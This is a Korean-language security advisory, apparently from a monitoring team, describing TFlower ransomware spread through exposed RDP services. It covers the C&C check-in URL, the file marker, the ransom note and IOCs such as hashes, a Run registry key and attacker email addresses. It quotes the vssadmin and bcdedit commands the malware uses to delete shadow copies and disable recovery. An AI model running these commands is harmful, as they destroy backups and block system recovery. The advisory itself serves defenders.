최근 기업의 외부로 오픈된 RDP(Remote Desktop Protocol) 서비스를 해킹하여 기업 내부망을 감염시키는 랜섬웨어 사고에 TFlower 랜섬웨어가 사용되었다.
해당 샘플은 지난 7월 말 보안 연구원 GrujaRS에 의해 처음 발견됬었다. 당시 일반적인 랜섬웨어 인것으로 추측 됬었느나, 이번 사고대응을 담당했던 업체는 TFlower 랜섬웨어가 점점 강해지고 있다고 밝혔다.
랜섬웨어가 실행되면 다음과 같은 콘솔화면 창이 나타나며, 랜섬웨어 수행활동에 대한 정보를 보여준다.
[그림 1] TFlower 콘솔
< 그림 출처 : https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/ >
이어서 C&C 서버와 연결 및 Windwos 10 복구 환경 비활성화 명령 및 섀도우 볼륨 복사본을 삭제된다. 그후 파일 암호화가 진행된다
| https://www.domain.com/wp-includes/wp-merge.php?name=[computer_name]&state=start |
|
vssadmin.exe delete shadows /all /quiet bcdedit.exe /set {default} recoveryenabled no bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {current} recoveryenabled no bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures |
TFlower 랜섬웨어에 암호화된 파일은 일반적인 랜섬웨어와 달리 암호화된 파일의 확장자를 추가하거나 변경하지는 않는지만, 다음 그림과 같이 파일은 헤더에 앞단에 “*tflower” 문자열이 들어간다.
[그림 2] TFlower 랜섬웨어에 암호화된 파일
< 그림 출처 : https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/ >
모든 행위가 완료되면 다음 그림과 같은 Windows 바탕화면에 !_Notice_!.txt 랜섬노트가 생성된다.
[그림 3] TFlower 랜섬노트
< 그림 출처 : https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/ >
IOCs
[SHA256]
6c75998580fb05c01b10f4703299ffd782bec55c8765c030b8a4760fff6045fe
[관련 파일]
!_Notice_!.txt
chille.exe
[레지스트리 항목]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "proxycap"="[path_to]\[ransomware].exe"
[관련 이메일 주소]
flower.harris@protonmail.com
flower.harris@tutanota.com
[reference]
https://www.pcrisk.com/removal-guides/15507-tflower-ransomware
보안관제센터 MIR Team